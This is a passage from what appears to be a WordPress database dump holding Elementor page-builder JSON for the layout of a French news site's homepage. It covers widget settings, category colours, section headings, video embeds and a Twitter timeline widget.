_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":71.469},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":28.53},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2409,771,'_elementor_version','0.4'),(2410,771,'_elementor_css','a:3:{s:4:\"time\";i:1509372159;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2412,772,'_elementor_edit_mode','builder'),(2413,772,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\